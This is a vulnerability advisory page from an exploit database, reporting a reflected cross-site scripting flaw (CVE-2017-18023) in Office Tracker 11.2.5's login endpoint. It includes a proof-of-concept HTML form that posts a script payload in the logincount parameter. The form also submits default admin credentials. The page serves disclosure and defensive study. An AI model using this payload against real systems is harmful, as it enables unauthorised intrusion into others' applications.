Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Office Tracker 11.2.5 Cross Site Scripting
2018.01.09
Credit:
Nassim Asrir
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2017-18023
CWE:
CWE-79
CVSS Base Score:
4.3/10
Impact Subscore:
2.9/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
None
Integrity impact:
Partial
Availability impact:
None
# Title: Office Tracker 11.2.5 - XSS # Author: Nassim Asrir # Contact: wassline@gmail.com # Vendor: https://www.officetracker.com/ # CVE: CVE-2017-18023 # Description Office Tracker 11.2.5 has XSS via the logincount parameter to the /otweb/OTPClientLogin URI. ------------------------------------------ # Details The value of the logincount request parameter is copied into the HTML document as plain text between tags. The payload chfkh<scriptalert(1)</scriptp9glb was submitted in the logincount parameter. This input was echoed unmodified in the application's response. ------------------------------------------ # Vulnerability Type Cross Site Scripting (XSS) ------------------------------------------ # Attack Type Remote ------------------------------------------ # POC <html> <body <scripthistory.pushState('', '', '/')</script <form action="http://server/otweb/OTPClientLogin" method="POST" <input type="hidden" name="logincount" value="0chfkh<script>alert(1)</script>p9glb" / <input type="hidden" name="lastname" value="MorisonM" / <input type="hidden" name="timezone" value="" / <input type="hidden" name="uid" value="" / <input type="hidden" name="phone" value="false" / <input type="hidden" name="login" value="admin" / <input type="hidden" name="password" value="admin" / <input type="hidden" name="submitbtn" value="Login" / <input type="submit" value="Submit request" / </form </body </html ------------------------------------------
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top